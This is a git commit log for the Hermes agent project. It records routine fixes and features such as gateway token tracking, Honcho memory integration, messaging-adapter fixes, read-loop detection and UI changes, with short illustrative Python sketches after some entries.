Minor defensive fix — accept both 'hide' and 'hidden' visibility values in codex model filtering.
2026-03-11 00:49:59 -07:00
teknium1
331af8df23 fix: clean up tools --summary output and type annotations
- Use Optional[List[str]] instead of List[str] | None (consistency)
- Add header, per-platform counts, and checkmark list format
- Matches the visual style of the interactive configurator
2026-03-11 00:47:26 -07:00
teknium1
3a2fd1a5c9 Merge PR #767: feat: add --summary flag to hermes tools
Authored by luisv-1. Adds hermes tools --summary for a quick
non-interactive view of enabled tools per platform.
2026-03-11 00:46:32 -07:00
teknium1
2e1aa1b424 docs: add iteration budget pressure section to configuration guide
Documents the two-tier budget warning system from PR #762:
- Explains caution (70%) and warning (90%) thresholds
- Table showing what the model sees at each tier
- Notes on how injection preserves prompt caching
- Links to max_turns config
2026-03-11 00:40:44 -07:00
teknium1
aead9c8ead chore: remove unnecessary pragma comments from Telegram adapter
Strip 18 '# pragma: no cover - defensive logging' annotations — these
are real code paths, not worth excluding from coverage.
2026-03-11 00:37:45 -07:00
teknium1
93230af7bd Merge PR #763: improve Telegram gateway error handling and logging
Authored by aydnOktay. Replaces print() statements with structured
logging calls (error/warning/info/debug) throughout the Telegram
adapter. Adds exc_info=True for stack traces on failures.
2026-03-11 00:37:28 -07:00
teknium1
21ff0d39ad feat: iteration budget pressure via tool result injection
Two-tier warning system that nudges the LLM as it approaches
max_iterations, injected into the last tool result JSON rather
than as a separate system message:

- Caution (70%): {"_budget_warning": "[BUDGET: 42/60...]"}
- Warning (90%): {"_budget_warning": "[BUDGET WARNING: 54/60...]"}

For JSON tool results, adds a _budget_warning field to the existing
dict. For plain text results, appends the warning as text.

Key properties:
- No system messages injected mid-conversation
- No changes to message structure
- Prompt cache stays valid
- Configurable thresholds (0.7 / 0.9)
- Can be disabled: _budget_pressure_enabled = False

Inspired by PR #421 (@Bartok9) and issue #414.
8 tests covering thresholds, edge cases, JSON and text injection.
2026-03-11 00:37:24 -07:00
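
A sketch of the injection rule described above: JSON tool results get a _budget_warning field, plain-text results get the warning appended. Threshold handling and message wording are simplified.

```python
import json

def inject_budget_warning(tool_result: str, used: int, budget: int) -> str:
    warning = f"[BUDGET: {used}/{budget} iterations used]"
    try:
        data = json.loads(tool_result)
        if isinstance(data, dict):
            data["_budget_warning"] = warning  # message structure unchanged
            return json.dumps(data)
    except json.JSONDecodeError:
        pass
    return tool_result + "\n" + warning  # plain-text fallback
```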
teknium1
4b619c9672 Merge PR #761: Improve Discord gateway error handling and logging
Authored by aydnOktay. Replaces bare print statements with structured
logger calls (error/warning/info) and adds exc_info=True for stack
traces on failure paths.
2026-03-11 00:35:31 -07:00
teknium1
c5321298ce docs: add quick commands documentation
Documents the quick_commands config feature from PR #746:
- configuration.md: full section with examples (server status, disk,
  gpu, update), behavior notes (timeout, priority, works everywhere)
- cli.md: brief section with config example + link to config guide
2026-03-11 00:28:52 -07:00
teknium1
359352b947 Merge PR #755: fix: head+tail truncation for execute_code stdout
Replaces head-only stdout capture with 40/60 head/tail split so final
print() output is never lost. 3 new tests.
2026-03-11 00:26:26 -07:00
teknium1
a9241f3e3e fix: head+tail truncation for execute_code stdout
Replaces head-only stdout capture with a two-buffer approach (40% head,
60% tail rolling window) so scripts that print() their final results
at the end never lose them. Adds truncation notice between sections.

Cherry-picked from PR #755, conflict resolved (test file additions).

3 new tests for short output, head+tail preservation, and notice format.
2026-03-11 00:26:13 -07:00
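
A sketch of the 40/60 head+tail split on an already-captured string; the real fix uses a rolling tail buffer so memory stays bounded during capture.

```python
def truncate_head_tail(text: str, limit: int) -> str:
    if len(text) <= limit:
        return text
    head = text[: int(limit * 0.4)]
    tail = text[-int(limit * 0.6):]  # final print() output survives
    return head + "\n...[output truncated]...\n" + tail
```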
teknium1
ea0a263434 Merge PR #758: feat(discord): add DISCORD_ALLOW_BOTS config for bot message filtering
Adds configurable bot message filtering via DISCORD_ALLOW_BOTS env var:
- 'none' (default): ignore all bot messages
- 'mentions': accept bots only when they @mention us
- 'all': accept all bot messages

Includes 8 tests.
2026-03-11 00:25:51 -07:00
teknium1
3be6e8a5f2 Merge PR #746: feat(cli,gateway): add user-defined quick commands that bypass agent loop
Authored by teyrebaz33. Adds config-driven quick commands that execute
shell commands without invoking the LLM — zero token usage, works from
Telegram/Discord/Slack/etc. Closes #744.
2026-03-11 00:24:34 -07:00
teknium1
2b244762e1 feat: add missing commands to categorized /help
Post-merge follow-up to PR #752 — adds 10 commands that were added
since the PR was submitted:

Session: /title, /compress, /rollback
Configuration: /provider, /verbose, /skin
Tools & Skills: /reload-mcp (+ full /skills description)
Info: /usage, /insights, /paste

Also preserved existing color formatting (_cprint, _GOLD, _BOLD, _DIM)
and skill commands section from main.
2026-03-10 23:49:03 -07:00
teknium1
a169a656b4 Merge PR #743: feat: hermes skills — enable/disable individual skills and categories
Authored by teyrebaz33. Fixes #642.
2026-03-10 23:46:42 -07:00
teknium1
a9fdd8dc3c Merge PR #752: feat(ux): improve /help formatting with command categories
Authored by Bartok9. Organizes /help output into categories (Session,
Configuration, Tools & Skills, Info, Exit) for better readability.
Fixes #640.
2026-03-10 23:45:41 -07:00
Bartok Moltbot
8eb9eed074 feat(ux): improve /help formatting with command categories (#640)
- Organize COMMANDS into COMMANDS_BY_CATEGORY dict
- Group commands: Session, Configuration, Tools & Skills, Info, Exit
- Add visual category headers with spacing
- Maintain backwards compat via flat COMMANDS dict
- Better visual hierarchy and scannability

Before:
  /help           - Show this help message
  /tools          - List available tools
  ... (dense list)

After:
  ── Session ──
    /new           Start a new conversation
    /reset         Reset conversation only
    ...

  ── Configuration ──
    /config        Show current configuration
    ...

Closes #640
2026-03-10 23:45:36 -07:00
teknium1
909e048ad4 fix: integration hardening for gateway token tracking
Follow-up to 58dbd81 — ensures smooth transition for existing users:

- Backward compat: old session files without last_prompt_tokens
  default to 0 via data.get('last_prompt_tokens', 0)
- /compress, /undo, /retry: reset last_prompt_tokens to 0 after
  rewriting transcripts (stale token counts would under-report)
- Auto-compression hygiene: reset last_prompt_tokens after rewriting
- update_session: use None sentinel (not 0) as default so callers
  can explicitly reset to 0 while normal calls don't clobber
- 6 new tests covering: default value, serialization roundtrip,
  old-format migration, set/reset/no-change semantics
- /reset: new SessionEntry naturally gets last_prompt_tokens=0

2942 tests pass.
2026-03-10 23:40:24 -07:00
teyrebaz33
5eb62ef423 test(gateway): add regression test for /retry response fix
Adds two tests for _handle_retry_command: verifies /retry returns the
agent response (not None), and verifies graceful handling when no
previous message exists.

Cherry-picked from PR #731 by teyrebaz33. Regression coverage for
the fix merged in PR #441.

Co-authored-by: teyrebaz33 <teyrebaz33@users.noreply.github.com>
2026-03-10 23:34:52 -07:00
teknium1
58dbd81f03 fix: use actual API token counts for gateway compression pre-check
Root cause of aggressive gateway compression vs CLI:
- CLI: single AIAgent persists across conversation, uses real API-reported
  prompt_tokens for compression decisions — accurate
- Gateway: each message creates fresh AIAgent, token count discarded after,
  next message pre-check falls back to rough str(msg)//4 estimate which
  overestimates 30-50% on tool-heavy conversations

Fix:
- Add last_prompt_tokens field to SessionEntry — stores the actual
  API-reported prompt token count from the most recent agent turn
- After run_conversation(), extract context_compressor.last_prompt_tokens
  and persist it via update_session()
- Gateway pre-check now uses stored actual tokens when available (exact
  same accuracy as CLI), falling back to rough estimate with 1.4x safety
  factor only for the first message of a session

This makes gateway compression behave identically to CLI compression
for all turns after the first. Reported by TigerHix.
2026-03-10 23:28:23 -07:00
Teknium
a35c37a2f9 Merge pull request #891 from NousResearch/hermes/hermes-b0162f8d
fix: sort Nous Portal model list (opus first, sonnet lower)
2026-03-10 23:21:01 -07:00
teknium1
1518734e59 fix: sort Nous Portal model list (opus first, sonnet lower)
fetch_nous_models() returned models in whatever order the API gave
them, which put sonnet near the top. Add a priority sort so users
see the best models first: opus > pro > other > sonnet.
2026-03-10 23:20:46 -07:00
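
A minimal sort key matching the priority described (opus > pro > other > sonnet); the real ordering rules may be more detailed.

```python
def _priority(model_id: str) -> int:
    name = model_id.lower()
    if "opus" in name:
        return 0
    if "pro" in name:
        return 1
    if "sonnet" in name:
        return 3
    return 2

models = sorted(["x/sonnet", "x/opus", "x/other", "x/pro"], key=_priority)
```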
teknium1
67b9470207 fix: reduce premature gateway compression on tool-heavy sessions
The gateway's session hygiene pre-check uses a rough char-based token
estimate (total_chars / 4) to decide whether to compress before the
agent starts. This significantly overestimates for tool-heavy and
code-heavy conversations because:

1. str(msg) on dicts includes Python repr overhead (keys, brackets, etc.)
2. Code/JSON tokenizes at 5-7+ chars/token, not the assumed 4

This caused users with 200k context to see compression trigger at
~100-113k actual tokens instead of the expected 170k (85% threshold).
Reported by TigerHix on Twitter.

Fix: apply a 1.4x safety factor to the gateway pre-check threshold.
This pre-check is only meant to catch pathologically large transcripts
— the agent's own compression uses actual API-reported token counts
for precise threshold management.
2026-03-10 23:16:49 -07:00
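
The pre-check heuristic described above, sketched: a rough chars/4 estimate with the 1.4x factor folded into the threshold so tool-heavy transcripts don't trigger compression prematurely. Parameter defaults mirror the numbers in the commit.

```python
def should_precompress(messages: list, context_limit: int,
                       threshold: float = 0.85, safety: float = 1.4) -> bool:
    est_tokens = sum(len(str(m)) for m in messages) / 4  # crude estimate
    return est_tokens > context_limit * threshold * safety
```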
teknium1
586fe5d62d Merge PR #724: feat: --yolo flag to bypass all approval prompts
Authored by dmahan93. Adds HERMES_YOLO_MODE env var and --yolo CLI flag
to auto-approve all dangerous command prompts.

Post-merge: renamed --fuck-it-ship-it to --yolo for brevity,
resolved conflict with --checkpoints flag.
2026-03-10 20:56:30 -07:00
teknium1
2d80ef7872 fix: _init_agent returns bool, not agent — fix quiet mode crash 2026-03-10 20:49:03 -07:00
Teknium
b76cae94d4 Merge pull request #889 from NousResearch/hermes/hermes-b0162f8d
fix: Docker backend fails when docker is not in PATH (macOS gateway)
2026-03-10 20:45:34 -07:00
teknium1
23270d41b9 feat: add --quiet/-Q flag for programmatic single-query mode
Adds -Q/--quiet to `hermes chat` for use by external orchestrators
(Paperclip, scripts, CI). When combined with -q, suppresses:
- Banner and ASCII art
- Spinner animations
- Tool preview lines (┊ prefix)

Only outputs:
- The agent's final response text
- A parseable 'session_id: <id>' line for session resumption

Usage: hermes chat -q 'Do something' -Q
Used by: Paperclip adapter (@nousresearch/paperclip-adapter-hermes)
2026-03-10 20:45:28 -07:00
teknium1
24479625a2 fix: Docker backend fails when docker is not in PATH (macOS gateway)
On macOS, Docker Desktop installs the CLI to /usr/local/bin/docker, but
when Hermes runs as a gateway service (launchd) or in other non-login
contexts, /usr/local/bin is often not in PATH. This causes the Docker
requirements check to fail with 'No such file or directory: docker' even
though docker works fine from the user's terminal.

Add find_docker() helper that uses shutil.which() first, then probes
common Docker Desktop install paths on macOS (/usr/local/bin,
/opt/homebrew/bin, Docker.app bundle). The resolved path is cached and
passed to mini-swe-agent via its 'executable' parameter.

- tools/environments/docker.py: add find_docker(), use it in
  _storage_opt_supported() and pass to _Docker(executable=...)
- tools/terminal_tool.py: use find_docker() in requirements check
- tests/tools/test_docker_find.py: 4 tests (PATH, fallback, not found, cache)

2877 tests pass.
2026-03-10 20:45:13 -07:00
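
A sketch of the lookup order described above: PATH first via shutil.which(), then common macOS install locations, with the result cached. The candidate list is abbreviated.

```python
import shutil
from functools import lru_cache
from pathlib import Path

_CANDIDATES = [
    "/usr/local/bin/docker",
    "/opt/homebrew/bin/docker",
    "/Applications/Docker.app/Contents/Resources/bin/docker",
]

@lru_cache(maxsize=1)
def find_docker() -> "str | None":
    found = shutil.which("docker")  # respects PATH when it's set up
    if found:
        return found
    for candidate in _CANDIDATES:   # launchd contexts often lack PATH
        if Path(candidate).is_file():
            return candidate
    return None
```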
arceus77-7
d41a214c1a feat(skills): add official optional 1password skill 2026-03-10 20:45:29 -04:00
vilkasdev
d502952bac fix(cli): add loading indicators for slow slash commands
Shows an immediate status message and braille spinner for slow slash
commands (/skills search|browse|inspect|install, /reload-mcp). Makes
input read-only while the command runs so the CLI doesn't appear frozen.

Cherry-picked from PR #714 by vilkasdev, rebased onto current main
with conflict resolution and bug fix (get_hint_text duplicate return).

Fixes #636

Co-authored-by: vilkasdev <vilkasdev@users.noreply.github.com>
2026-03-10 17:31:00 -07:00
Teknium
ac53bf1d71 Merge pull request #881 from NousResearch/hermes/hermes-b0162f8d
fix: provider selection not persisting when switching via hermes model
2026-03-10 17:13:26 -07:00
teknium1
145c57fc01 fix: provider selection not persisting when switching via hermes model
Two related bugs prevented users from reliably switching providers:

1. OPENAI_BASE_URL poisoning OpenRouter resolution: When a user with a
   custom endpoint ran /model openrouter:model, _resolve_openrouter_runtime
   picked up OPENAI_BASE_URL instead of the OpenRouter URL, causing model
   validation to probe the wrong API and reject valid models.

   Fix: skip OPENAI_BASE_URL when requested_provider is explicitly
   'openrouter'.

2. Provider never saved to config: _save_model_choice() could save
   config.model as a plain string. All five _model_flow_* functions then
   checked isinstance(model, dict) before writing the provider — which
   silently failed on strings. With no provider in config, auto-detection
   would pick up stale credentials (e.g. Codex desktop app) instead of
   the user's explicit choice.

   Fix: _save_model_choice() now always saves as dict format. All flow
   functions also normalize string->dict as a safety net before writing
   provider.

Adds 4 regression tests. 2873 tests pass.
2026-03-10 17:12:34 -07:00
teknium1
2dddfce08c fix: log prefill parse errors + clean up cron scheduler tests
Follow-up to PR #716 (0xbyt4):
- Log the third remaining silent except-pass in scheduler (prefill
  messages JSON parse failure)
- Fix test mock: run → run_conversation (matches actual agent API)
- Remove unused imports (asyncio, AsyncMock)
- Add test for prefill_messages parse failure logging
2026-03-10 17:10:01 -07:00
teknium1
03a4f184e6 fix: call _stop_training_run on early-return failure paths
The 4 early-return paths in _spawn_training_run (API exit, trainer
exit, env not found, env exit) were doing manual process.terminate()
or returning without cleanup, leaking open log file handles. Now all
paths call _stop_training_run() which handles both process termination
and file handle closure.

Also adds 12 tests for _stop_training_run covering file handle
cleanup, process termination, status transitions, and edge cases.

Inspired by PR #715 (0xbyt4) which identified the early-return issue.
Core file handle fix was already on main via e28dc13 (memosr.eth).
2026-03-10 17:09:51 -07:00
teknium1
be2e259596 Merge PR #716: fix: log exceptions instead of silently swallowing in cron scheduler
Authored by 0xbyt4. Replaces two except-Exception-pass blocks with
logger.warning() calls and adds tests for both paths.
2026-03-10 17:05:59 -07:00
teknium1
05bc8b19fe Merge PR #713: docs: clarify Telegram token regex constraint
Authored by VolodymyrBg.
2026-03-10 16:59:54 -07:00
teknium1
cb6b70bbfb Merge PR #709: fix: close log file handles to prevent resource leaks
Authored by memosr. Fixes bare open() calls in browser_tool.py and
unclosed log file handles in rl_training_tool.py.
2026-03-10 16:26:29 -07:00
teknium1
a458b535c9 fix: improve read-loop detection — consecutive-only, correct thresholds, fix bugs
Follow-up to PR #705 (merged from 0xbyt4). Addresses several issues:

1. CONSECUTIVE-ONLY TRACKING: Redesigned the read/search tracker to only
   warn/block on truly consecutive identical calls. Any other tool call
   in between (write, patch, terminal, etc.) resets the counter via
   notify_other_tool_call(), called from handle_function_call() in
   model_tools.py. This prevents false blocks in read→edit→verify flows.

2. THRESHOLD ADJUSTMENT: Warn on 3rd consecutive (was 2nd), block on
   4th+ consecutive (was 3rd+). Gives the model more room before
   intervening.

3. TUPLE UNPACKING BUG: Fixed get_read_files_summary() which crashed on
   search keys (5-tuple) when trying to unpack as 3-tuple. Now uses a
   separate read_history set that only tracks file reads.

4. WEB_EXTRACT DOCSTRING: Reverted incorrect removal of 'title' from
   web_extract return docs in code_execution_tool.py — the field IS
   returned by web_tools.py.

5. TESTS: Rewrote test_read_loop_detection.py (35 tests) to cover
   consecutive-only behavior, notify_other_tool_call, interleaved
   read/search, and summary-unaffected-by-searches.
2026-03-10 16:25:41 -07:00
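
A sketch of the consecutive-only tracking described above: identical read/search calls increment a counter, any other tool call resets it. The warn-on-3rd/block-on-4th thresholds come from the commit; everything else is illustrative.

```python
class ReadLoopTracker:
    def __init__(self) -> None:
        self._last_key = None
        self._count = 0

    def notify_other_tool_call(self) -> None:
        # write/patch/terminal/etc. breaks the streak
        self._last_key, self._count = None, 0

    def check(self, key) -> str:
        if key == self._last_key:
            self._count += 1
        else:
            self._last_key, self._count = key, 1
        if self._count >= 4:
            return "block"
        if self._count == 3:
            return "warn"
        return "ok"
```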
teknium1
b53d5dad67 Merge PR #705: fix: detect, warn, and block file re-read/search loops after context compression
Authored by 0xbyt4. Adds read/search loop detection, file history injection after compression, and todo filtering for active items only.
2026-03-10 16:17:03 -07:00
teknium1
ad7a16dca6 fix: remove left/right borders from response box for easier copy-paste
Use rich_box.HORIZONTALS instead of the default ROUNDED box style
for the agent response panel. This keeps the top/bottom horizontal
rules (with title) but removes the vertical │ borders on left and
right, making it much easier to copy-paste response text from the
terminal.
2026-03-10 15:59:08 -07:00
teknium1
6e851a1f6a Merge PR #873: fix: eliminate 3x SQLite message duplication in gateway sessions
Fixes #860.
2026-03-10 15:29:24 -07:00
teknium1
c1171fe666 fix: eliminate 3x SQLite message duplication in gateway sessions (#860)
Three separate code paths all wrote to the same SQLite state.db with
no deduplication, inflating session transcripts by 3-4x:

1. _log_msg_to_db() — wrote each message individually after append
2. _flush_messages_to_session_db() — re-wrote ALL new messages at
   every _persist_session() call (~18 exit points), with no tracking
   of what was already written
3. gateway append_to_transcript() — wrote everything a third time
   after the agent returned

Since load_transcript() prefers SQLite over JSONL, the inflated data
was loaded on every session resume, causing proportional token waste.

Fix:
- Remove _log_msg_to_db() and all 16 call sites (redundant with flush)
- Add _last_flushed_db_idx tracking in _flush_messages_to_session_db()
  so repeated _persist_session() calls only write truly new messages
- Reset flush cursor on compression (new session ID)
- Add skip_db parameter to SessionStore.append_to_transcript() so the
  gateway skips SQLite writes when the agent already persisted them
- Gateway now passes skip_db=True for agent-managed messages, still
  writes to JSONL as backup

Verified: a 12-message CLI session with tool calls produces exactly
12 SQLite rows with zero duplicates (previously would be 36-48).

Tests: 9 new tests covering flush deduplication, skip_db behavior,
compression reset, and initialization. Full suite passes (2869 tests).
2026-03-10 15:22:44 -07:00
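
A sketch of the flush-cursor idea described above: remember how many messages were already written and only persist the suffix. Storage details are simplified to a callback.

```python
class SessionFlusher:
    def __init__(self) -> None:
        self._last_flushed_db_idx = 0

    def flush(self, messages: list, write_rows) -> None:
        new = messages[self._last_flushed_db_idx:]
        if new:
            write_rows(new)  # e.g. a sqlite executemany under the hood
            self._last_flushed_db_idx = len(messages)

    def reset_after_compression(self) -> None:
        # new session ID -> transcript rewritten, start the cursor over
        self._last_flushed_db_idx = 0
```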
teknium1
2210068f5b Merge: fix(signal) align send() signature with base class 2026-03-10 15:18:31 -07:00
teknium1
d6ab35c1a3 fix(signal): align send() signature with base class (content, reply_to, metadata)
Signal's send() used 'text' instead of 'content' and 'reply_to_message_id'
instead of 'reply_to', mismatching BasePlatformAdapter.send(). Callers in
gateway/run.py use keyword args matching the base interface, so Signal's
send() was missing its required 'text' positional arg.

Fixes: 'SignalAdapter.send() missing 1 required positional argument: text'
2026-03-10 15:18:26 -07:00
teknium1
5fc751e543 Merge: fix(gateway) add metadata param to _keep_typing and base send_typing 2026-03-10 15:08:45 -07:00
teknium1
cea78c5e27 fix(gateway): add metadata param to _keep_typing and base send_typing
_keep_typing() was called with metadata= for thread-aware typing
indicators, but neither it nor the base send_typing() accepted
that parameter. Most adapter overrides (Slack, Discord, Telegram,
WhatsApp, HA) already accept metadata=None, but the base class
and Signal adapter did not.

- Add metadata=None to BasePlatformAdapter.send_typing()
- Add metadata=None to BasePlatformAdapter._keep_typing(), pass through
- Add metadata=None to SignalAdapter.send_typing()

Fixes TypeError in _process_message_background for Signal.
2026-03-10 15:08:40 -07:00
teknium1
53be6afe92 Merge PR #871: fix(signal): use media_urls/media_types in MessageEvent construction 2026-03-10 15:00:08 -07:00
teknium1
d04b9f4dc5 fix(signal): use media_urls/media_types instead of non-existent image_paths/audio_path/document_paths
The Signal adapter was passing image_paths, audio_path, and document_paths
to MessageEvent.__init__(), but those fields don't exist on the dataclass.
MessageEvent uses media_urls (List[str]) and media_types (List[str]).

Changes:
- Replace separate image_paths/audio_path/document_paths with unified
  media_urls and media_types lists (matching Discord, Slack, etc.)
- Add _ext_to_mime() helper to map file extensions to MIME types
- Use Signal's contentType from attachment metadata when available,
  falling back to extension-based mapping
- Update message type detection to check media_types prefixes

Fixes TypeError: MessageEvent.__init__() got an unexpected keyword
argument 'image_paths'
2026-03-10 14:58:16 -07:00
arceus777@proton.me
d94519c5ba fix(skills): classify local skills separately in skills list 2026-03-10 17:22:36 -04:00
Erosika
4c54c2709c Revert "refactor(honcho): write all host-scoped settings into hosts block"
This reverts commit c90ba029ce.
2026-03-10 17:11:58 -04:00
Erosika
c90ba029ce refactor(honcho): write all host-scoped settings into hosts block
Setup wizard now writes memoryMode, writeFrequency, recallMode, and
sessionStrategy into hosts.hermes instead of the config root. Client
resolution updated to read sessionStrategy and sessionPeerPrefix from
host block first. Docs updated to show hosts-based config as the default
example so other integrations can coexist cleanly.
2026-03-10 17:00:52 -04:00
Erosika
5489c66cdf docs(honcho): restore use cases, example queries, and configurability language
Adds back use cases section and example tool queries from the original
docs. Clarifies that built-in memory and Honcho can work together or be
configured separately via memoryMode.
2026-03-10 16:54:34 -04:00
Erosika
960c1521f3 docs(honcho): rewrite Honcho Memory docs as full feature documentation
Replaces the stub docs with comprehensive coverage: setup (interactive +
manual), all config fields, memory modes, recall modes, write frequency,
session strategies, host blocks, async prefetch pipeline, dual-peer
architecture, dynamic reasoning, gateway integration, four tools, full
CLI reference, migration paths, and AI peer identity. Trims the Honcho
section in memory.md to a cross-reference.
2026-03-10 16:49:14 -04:00
SHL0MS
149516f365 Merge pull request #854 from NousResearch/add-ascii-video-skill
Add ASCII video skill to creative category
2026-03-10 16:34:57 -04:00
adavyas
87349b9bc1 fix(gateway): persist Honcho managers across session requests 2026-03-10 16:21:42 -04:00
adavyas
87cc5287a8 fix(honcho): enforce local mode and cache-safe warmup 2026-03-10 16:21:42 -04:00
Erosika
c047c03e82 feat(honcho): honcho_context can query any peer (user or ai)
Optional 'peer' parameter: "user" (default) or "ai". Allows asking
about the AI assistant's history/identity, not just the user's.
2026-03-10 16:21:07 -04:00
Erosika
0cb639d472 refactor(honcho): rename query_user_context to honcho_context
Consistent naming: all honcho tools now prefixed with honcho_
(honcho_context, honcho_search, honcho_profile, honcho_conclude).
2026-03-10 16:21:07 -04:00
Erosika
792be0e8e3 feat(honcho): add honcho_conclude tool for writing facts back to memory
New tool lets Hermes persist conclusions about the user (preferences,
corrections, project context) directly to Honcho via the conclusions
API. Feeds into the user's peer card and representation.
2026-03-10 16:21:07 -04:00
Erosika
c1228e9a4a refactor(honcho): rename recallMode "auto" to "hybrid"
Matches the mental model: hybrid = context + tools,
context = context only, tools = tools only.
2026-03-10 16:21:07 -04:00
Erosika
6782249df9 fix(honcho): rewrite tokens and peer CLI help for clarity
Explain what context vs dialectic actually do in plain language:
context = raw memory retrieval, dialectic = AI-to-AI inference
for session continuity. Describe what user/AI peer cards are.
2026-03-10 16:21:07 -04:00
Erosika
b4af03aea8 fix(honcho): clarify API key signup instructions
Tell users to go to app.honcho.dev > Settings > API Keys.
Updated in setup walkthrough, setup prompt, and client error message.
2026-03-10 16:21:07 -04:00
Erosika
74c214e957 feat(honcho): async memory integration with prefetch pipeline and recallMode
Adds full Honcho memory integration to Hermes:

- Session manager with async background writes, memory modes (honcho/hybrid/local),
  and dialectic prefetch for first-turn context warming
- Agent integration: prefetch pipeline, tool surface gated by recallMode,
  system prompt context injection, SIGTERM/SIGINT flush handlers
- CLI commands: setup, status, mode, tokens, peer, identity, migrate
- recallMode setting (auto | context | tools) for A/B testing retrieval strategies
- Session strategies: per-session, per-repo (git tree root), per-directory, global
- Polymorphic memoryMode config: string shorthand or per-peer object overrides
- 97 tests covering async writes, client config, session resolution, and memory modes
2026-03-10 16:21:07 -04:00
SHL0MS
0229e6b407 Fix test_analysis_error_logs_exc_info: mock _aux_async_client so download path is reached 2026-03-10 16:03:19 -04:00
SHL0MS
c358af7861 Add ASCII video skill to creative category 2026-03-10 15:54:38 -04:00
teknium1
8eefbef91c fix: replace ANSI response box with Rich Panel + reduce widget flashing
Major UX improvements:

1. Response box now uses a Rich Panel rendered through ChatConsole
   instead of hand-rolled ANSI box-drawing borders. Rich Panels
   adapt to terminal width at render time, wrap content inside
   the borders properly, and use skin colors natively.

2. ChatConsole now reads terminal width at render time via
   shutil.get_terminal_size() instead of defaulting to 80 cols.
   All Rich output adapts to the current terminal size.

3. User-input separator reduced to fixed 40-char width so it
   never wraps regardless of terminal resize.

4. Approval and clarify countdown repaints throttled to every 5s
   (was 1s), dramatically reducing flicker in Kitty/ghostty.
   Selection changes still trigger instant repaints via key bindings.

5. Sudo widget now uses dynamic _panel_box_width() instead of
   hardcoded border strings.

Tests: 2860 passed.
2026-03-10 07:04:02 -07:00
teknium1
e590caf8d8 Revert "Merge PR #702: feat: configurable embedding infrastructure — local (fastembed) + API (OpenAI)"
This reverts commit 46b95ee694, reversing
changes made to 0fdeffe6c4.
2026-03-10 07:00:54 -07:00
teknium1
46b95ee694 Merge PR #702: feat: configurable embedding infrastructure — local (fastembed) + API (OpenAI)
Authored by teyrebaz33. Adds agent/embeddings.py with Embedder protocol,
FastEmbedEmbedder (local, 384d), OpenAIEmbedder (API, 1536d), factory,
and cosine similarity utilities. 30 tests. Optional fastembed dependency.
Infrastructure for #509 (cognitive memory) and #489 (semantic search).
Closes #675.
2026-03-10 06:59:22 -07:00
teknium1
0fdeffe6c4 fix: replace silent exception swallowing with debug logging across tools
Add logger.debug() calls to 27 bare 'except: pass' blocks across 7 core
files, giving visibility into errors that were previously silently
swallowed. This makes it much easier to diagnose user-reported issues
from debug logs.

Files changed:
- tools/terminal_tool.py: 5 catches (stat, termios, fd close, cleanup)
- tools/delegate_tool.py: 7 catches + added logger (spinner, callbacks)
- tools/browser_tool.py: 5 catches (screenshot/recording cleanup, daemon kill)
- tools/code_execution_tool.py: 2 remaining catches (socket, server close)
- gateway/session.py: 2 catches (platform enum parse, temp file cleanup)
- agent/display.py: 2 catches + added logger (JSON parse in failure detect)
- agent/prompt_builder.py: 1 catch (skill description read)

Deliberately kept bare pass for:
- ImportError checks for optional dependencies (terminal_tool.py)
- SystemExit/KeyboardInterrupt handlers
- Spinner _write catch (would spam on every frame when stdout closed)
- process_registry PID-alive check (canonical os.kill(pid,0) pattern)

Extends the pattern from PR #686 (@aydnOktay).
2026-03-10 06:59:20 -07:00
teyrebaz33
cc4ead999a feat: configurable embedding infrastructure — local (fastembed) + API (OpenAI) (#675)
- Add agent/embeddings.py with Embedder protocol, FastEmbedEmbedder, OpenAIEmbedder
- Factory function get_embedder() reads provider from config.yaml embeddings section
- Lazy initialization — no startup impact, model loaded on first embed call
- cosine_similarity() and cosine_similarity_matrix() utility functions included
- Add fastembed as optional dependency in pyproject.toml
- 30 unit tests, all passing

Closes #675
2026-03-10 06:56:18 -07:00
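
A pure-Python version of the cosine similarity utility this module exposes; the real implementation is presumably vectorized.

```python
import math

def cosine_similarity(a: list, b: list) -> float:
    dot = sum(x * y for x, y in zip(a, b))
    na = math.sqrt(sum(x * x for x in a))
    nb = math.sqrt(sum(y * y for y in b))
    return dot / (na * nb) if na and nb else 0.0
```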
teknium1
60cba55d82 Merge PR #701: fix: tool call repair — auto-lowercase, fuzzy match, helpful error on unknown tool
Authored by teyrebaz33. Adds _repair_tool_call() method: tries lowercase,
normalize (hyphens/spaces → underscores), then fuzzy match (difflib, 0.7
cutoff). Replaces hard abort after 3 retries with graceful error message
sent back to model for self-correction. Fixed bug where valid tool calls
in a mixed batch would get no results (now all get results).
Fixes #520.
2026-03-10 06:54:17 -07:00
teyrebaz33
1caee06b22 fix: tool call repair — auto-lowercase, fuzzy match, helpful error on unknown tool (#520)
- Add _repair_tool_call(): tries lowercase, normalize, then fuzzy match (difflib 0.7)
- Replace 3-retry-then-abort with graceful error: model receives helpful message and self-corrects
- Conversation stays alive instead of dying on hallucinated tool names

Closes #520
2026-03-10 06:54:11 -07:00
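
A sketch of the repair ladder described above: lowercase, normalize separators, then fuzzy match via difflib with the 0.7 cutoff the commit mentions.

```python
import difflib

def repair_tool_name(name: str, valid: set) -> "str | None":
    lowered = name.lower()
    if lowered in valid:
        return lowered
    normalized = lowered.replace("-", "_").replace(" ", "_")
    if normalized in valid:
        return normalized
    matches = difflib.get_close_matches(normalized, sorted(valid), n=1, cutoff=0.7)
    return matches[0] if matches else None
```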
teknium1
a6eaf0f41f Merge PR #700: fix(config): atomic write for config.yaml to prevent data loss on crash
Authored by alireza78a. Adds atomic_yaml_write() to utils.py (mirrors
existing atomic_json_write pattern), replaces bare open('w') in
save_config(). Integrated with max_turns normalization and commented
sections via extra_content param. 3 new tests for crash safety.
2026-03-10 06:48:43 -07:00
alireza78a
fadad820dd fix(config): atomic write for config.yaml to prevent data loss on crash 2026-03-10 06:48:37 -07:00
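
The atomic-write pattern these config/session fixes share, sketched generically: write to a temp file in the same directory, then os.replace() so readers see either the old file or the complete new one. YAML serialization is left to the caller here.

```python
import os
import tempfile

def atomic_write_text(path: str, text: str) -> None:
    directory = os.path.dirname(path) or "."
    fd, tmp = tempfile.mkstemp(dir=directory)  # same filesystem as target
    try:
        with os.fdopen(fd, "w", encoding="utf-8") as f:
            f.write(text)
        os.replace(tmp, path)  # atomic rename on POSIX and Windows
    except BaseException:
        os.unlink(tmp)  # never leave a partial temp file behind
        raise
```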
teknium1
e8b19b5826 fix: cap user-input separator at 120 cols (matches response box) 2026-03-10 06:47:26 -07:00
teknium1
9ea2209a43 fix: reduce approval/clarify widget flashing + dynamic border widths
Three UI improvements:

1. Throttle countdown repaints to every 5s (was 1s) for approval
   and clarify widgets. The frequent invalidation caused visible
